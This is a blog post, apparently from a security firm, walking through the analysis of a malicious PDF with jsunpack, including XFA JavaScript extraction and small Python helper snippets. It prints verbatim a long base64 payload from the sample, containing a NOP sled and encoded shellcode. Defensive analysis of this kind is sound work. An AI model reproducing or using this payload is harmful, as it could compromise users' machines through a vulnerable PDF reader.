Saturday, April 27, 2013

Analyzing Malicious PDFs or: How I Learned to Stop Worrying and Love Adobe Reader (Part 1)

http://visiblerisk.com/blog/2013/4/8/analyzing-malicious-pdfs-or-how-i-learned-to-stop-worrying-a.html

We here at Visible Risk love open source software. Some of the best applications used by security professionals are open source; Volatility and Wireshark are just two examples. We also want to contribute back to the community as much as we can. This blog post and the next will focus on analyzing malicious PDF files and the changes we’ve made to jsunpack to facilitate this analysis. The changes involve extracting JavaScript from XFA objects (part 1), handling the various encryption methods used (part 2), and parsing and analyzing object streams (also part 2). We’ve shared these changes back to the jsunpack project, and they should be available in the latest version of jsunpack.
Adobe Reader has had its share of vulnerabilities over the years. Because of this, PDFs are a popular delivery mechanism for client-side attacks. However, instead of focusing on creating signatures for each individual exploit, it’s usually easier and more effective to focus on the part of the attack that is most common… JavaScript.
PDFs can carry JavaScript in essentially two ways: defined in JavaScript objects or defined inside XFA objects. Since we have better things to do than manually extract this information, it would be nice if there were a way to extract it programmatically. Thankfully, there’s an open source project that already does this, the aforementioned jsunpack. As an example, we’ll use a malicious PDF with a SHA256 of 7d033b4aafbae119e9459a06530b4d4c6202fb6b697f4b048a63344c1e0bc30f.
We start by running the main jsunpack script on the PDF.
(23)>python jsunpackn.py ~/malpdf.pdf
(24)>
Well, that was disappointing. I wonder what happened? To investigate, we’ll run pdf.py on it directly.

(25)>python pdf.py ~/malpdf.pdf
parsing malpdf.pdf
Wrote JavaScript (22817 bytes -- 16999 headers / 5818 code) to file malpdf.pdf.out
That’s promising. Let’s take a quick look.

Looks like JavaScript to me! Let’s run it in SpiderMonkey.
(12)>js malpdf.pdf.out
malpdf.pdf.out:8: SyntaxError: missing ) after condition:
malpdf.pdf.out:8: i=7;y=bib(b,i);s=nob();if(s&gt;=t){v=d;v+=kit(p,x);q=8;v+=bib(lab,q);
malpdf.pdf.out:8: ___________________________^
So close! And that explains why jsunpackn didn’t display anything. Let’s take a closer look at the PDF. We see that in obj 9 0, obj 6 0 is defined as an XFA object.
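To show how such a reference can be located programmatically, here is a minimal sketch that searches raw PDF bytes for an /XFA entry. It is not jsunpack’s code: the function name and the sample fragment are hypothetical, and it assumes /XFA points at a single indirect object (real PDFs may use an array of references instead).

```python
import re

# Matches an indirect reference such as "/XFA 6 0 R".
# Assumption: /XFA points at one stream object rather than an array.
XFA_REF = re.compile(rb"/XFA\s+(\d+)\s+(\d+)\s+R")

def find_xfa_refs(pdf_bytes):
    """Return (object number, generation) pairs referenced by /XFA."""
    return [(int(num), int(gen)) for num, gen in XFA_REF.findall(pdf_bytes)]

# Hypothetical fragment shaped like the object described above.
sample = b"9 0 obj\n<< /XFA 6 0 R >>\nendobj\n"
print(find_xfa_refs(sample))
```

A regular expression is enough for a quick triage pass, but it will miss references hidden inside compressed object streams.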

Looking at obj 6 0, we see that it’s compressed.

Specifically, you see that the filter used is called FlateDecode. FlateDecode is the deflate compression method from zlib. Several different filters can be used, and they can be chained together. Decompressing this stream is no worry because jsunpack already handles compressed streams. After decompressing this stream, we can see the data is XML, so the simplest way to navigate it is with an XML parser. A parser also has the benefit of converting the &gt; to a > for us. After making these changes to pdf.py, we extract the JavaScript again and run it.
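The idea can be sketched in a few lines of Python. This is an illustration under stated assumptions, not the actual change made to pdf.py: the function name and the sample XML are hypothetical, and the script elements are matched by local tag name only.

```python
import zlib
import xml.etree.ElementTree as ET

def extract_scripts(compressed_stream):
    """Inflate a FlateDecode stream and return the text of every <script> element."""
    xml_bytes = zlib.decompress(compressed_stream)
    root = ET.fromstring(xml_bytes)
    scripts = []
    for elem in root.iter():
        # Drop any "{namespace}" prefix so the match works with or without namespaces.
        if elem.tag.rsplit("}", 1)[-1] == "script":
            scripts.append(elem.text or "")
    return scripts

# Hypothetical XFA-like document containing an escaped comparison operator.
sample_xml = (b'<template><field name="f1"><event>'
              b'<script>if(s&gt;=t){v=d;}</script>'
              b'</event></field></template>')
print(extract_scripts(zlib.compress(sample_xml)))
```

Because the XML parser resolves entities, the extracted script text contains a literal > and parses as JavaScript.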
(52)>js malpdf.pdf.out
malpdf.pdf.out:12: ReferenceError: vKMfFyr1 is not defined
Progress! A different error this time. What in the world is vKMfFyr1? And why would the JavaScript expect it to be defined? Looking back at the XML data, we see that vKMfFyr1 is the name of the field tag that contains the JavaScript. We also see it is the name of a tag in the <xfa:data> section. As it turns out, Adobe Reader will give its JavaScript engine an object with the name from the field tag, vKMfFyr1, and set its rawValue property to the corresponding data in the <xfa:data> tag. In our case, it’s empty, but we do need the property defined. We add those changes in, and we run it again.
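One way to provide that object is to prepend a small JavaScript prelude to the extracted script. The sketch below is our illustration of the idea rather than the code that went into pdf.py; build_prelude is a hypothetical helper name.

```python
import json
import re

def build_prelude(field_name, raw_value=""):
    """Return JavaScript that defines the object a field's script expects."""
    # Refuse names that are not plain identifiers, since they are pasted into code.
    if not re.fullmatch(r"[A-Za-z_$][A-Za-z0-9_$]*", field_name):
        raise ValueError("unexpected field name: %r" % field_name)
    # json.dumps yields a quoted, escaped string literal that JavaScript accepts.
    return "var %s = {rawValue: %s};\n" % (field_name, json.dumps(raw_value))

print(build_prelude("vKMfFyr1"))
```

The prelude is written ahead of the field’s script in the output file, so the engine finds the object when the script runs.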
(55)>js malpdf.pdf.out
(56)>
No more errors! Still no output, though. Let’s take a closer look at the last part of the extracted JavaScript.

What does vKMfFyr1[u] = v do? It turns out u is the string “rawValue” and v is a really long string. Since we want to analyze this string, we make pdf.py print out the value of rawValue. And this is what we see:
SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQ6xe5iQMAAIs0JIn3VoA+XnQGrDTcquL6w+jk////glGqyDSG3dzcZanf3NxVGy94IzxRbNTf3Nw0mN3c3EtRQ9zZ3Ny21oGR01hM3Nzcios0t93c3LRc3tzcj4s05N3c3FkcqN43PLS9XQUTNG7e3NwjDODaoMQ0r93c3OHc/NzcodCPNHHc3NxZHKnCN2SPNLjc3NxZHKnO7Ry4V5zEV5zo4Tje3NyoBjdAi1UrtiOF7RwgLnJLg1zk3KjfSjdYi+0ctiOFIC66cxubIufc7dyDtFze3NyPizRn3NzctC4HqHE0W93c3LREs5PhjDRq3dzctty2IiMMiVU5toiF9RC8UaD4/IvtHC92g1GrzLaYU9rtB7RUIm/KNNje3NyLio+Pj4+Pj48jqdQjDFWY+MC9FR7Y3IlVObbghfUQi1Gg+NiNi+0cL3aDU9u2r7Sy3L3ctK7cqdxVu9AjqdRTm8y0JqZJODTY3dzctAEE8iCMNO/d3NyLIwxfGNCDFR7Y3LSIFnNNNETd3Ny2nLTczNzctt223CMMH4lVOTSE3dzctLkzk9mMNCHc3NztFY2NI6nMI6nQI6nUjSMMFR7Q3IlVObQuB6hxNH7c3Ny0opZfC4w0Ddzc3LbctPncj9xR0PgjqdCNI6nUIwwVHtTciVU5XTDU3tzcvO0HtKs31/00ttzc3Eq003vChYo0RNzc3FGRII221LYjIwxNP5a0hrIHB4o0XNzc3FGRJFFhJCEjI4203N7c3Iu2xSOpICMMTT/5tBFQqy2KNIfc3Nwj6yMM02rUlbTuotr8ijSU3NzcjSPrIwxXxFWA+MC9FR+87Ry4V4zsV47QV47IV6707SPtHHCaWRyo0eC9oN7w/B0T0d0bNzfnoPj4V57MV86pB1WY+MC9HtjcvFew+PhXmeBXiNmk3TZXlsRXhvzdNz/olVfoV90y7SPtHCBwWByo2x0T0d0bNyjnoPj0qT1XhvjdN7pX0JdXhsDdN1fYV900VZj4wL0e1Ny0s7Lc3LSprrCxiDTf3NzchYUftFKS0jC0yxb3sjSIIyMjjDRUIyMjIzy0yxb3sjSeIyMjI6j42Iw0riMjIx7Y3LSoqKzm8/Ompq6ysrm9uba0tfK4uLKv8rK9sbnzvuqys6S97fPj7u+5uOu/v+vtv7noueXr7unr6L7s7Om67Onp5Ont7O7s7ezr6bjpuuzv7O3p7+y/7Ovs7unr6e7suem+6b3s6+ft5+/c3NwAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol


Excellent, jsunpack’s pdf parser has done its job.
But what about that string? It looks base64 encoded to me; let’s treat it as such and decode it. When you decode it, you get a string that begins like this:
49492a003820000090909090909090909090909090909090909090909090909090909090909090909090909090909090
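The decoding step is easy to reproduce. As a small check, this snippet decodes only the first 16 characters of the rawValue string and prints the result as hex:

```python
import base64

# First 16 characters of the rawValue string shown above.
prefix = "SUkqADggAACQkJCQ"
decoded = base64.b64decode(prefix)
print(decoded.hex())  # 49492a003820000090909090
```

The same call on the full string yields the complete payload for further analysis.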
That looks like some shellcode to me. Let’s analyze that. At 1534 bytes into the string, there is a sequence of bytes that, interpreted as an x86 instruction, would be a near call. Shellcode often uses near call instructions to find itself in memory. A near call pushes its return address, the address of the instruction after the call, onto the stack. The shellcode can then read that address from the stack and use it to locate and deobfuscate the rest of the shellcode.
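A rough way to spot this pattern is to scan for the near call opcode (0xE8) followed by a small negative 32-bit displacement. The sketch below is a heuristic of our own, not part of jsunpack, and it will produce false positives on arbitrary data. The sample bytes are the decoder stub as we read it from the decoded string; treat them as illustrative.

```python
import struct

def find_backward_calls(data, max_distance=0x100):
    """Return (call offset, target offset) for each E8 call that jumps backward."""
    hits = []
    for i in range(len(data) - 4):
        if data[i] != 0xE8:
            continue
        # rel32 is relative to the address of the instruction after the call.
        (rel,) = struct.unpack_from("<i", data, i + 1)
        target = i + 5 + rel
        if -max_distance <= rel < 0 and target >= 0:
            hits.append((i, target))
    return hits

# jmp over the stub, the stub itself, then "call" back to the stub's first instruction.
stub = bytes.fromhex("eb17b9890300008b342489f756803e5e7406ac34dcaae2fac3e8e4ffffff")
print(find_backward_calls(stub))  # [(25, 2)]
```

Here the call at offset 25 targets offset 2, which is 0x17 bytes before the call.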
